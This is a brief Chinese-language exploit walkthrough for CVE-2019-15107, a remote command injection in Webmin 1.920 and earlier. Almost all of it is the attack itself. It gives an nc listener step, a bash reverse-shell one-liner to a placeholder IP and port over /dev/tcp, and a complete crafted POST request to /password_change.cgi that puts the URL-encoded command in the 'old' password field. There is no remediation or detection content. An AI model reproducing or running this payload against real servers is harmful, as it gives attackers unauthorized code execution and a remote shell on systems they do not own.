Webmin
1.漏洞复现
CVE-2019-15107
影响范围:Webmin <= 1.920
先用NC监听,使用以下请求包反弹shell
echo 'bash -i >& /dev/tcp/IP/端口 0>&1' > /tmp/shell;bash /tmp/shell
POST /password_change.cgi HTTP/1.1 Host: IP:10000 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: redirect=1; testing=1; sid=x; sessiontest=1 Referer: https://IP与Host一致:10000/session_login.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 125 user=hacker&pam=&expired=2&old=命令URL编码&new1=test2&new2=test2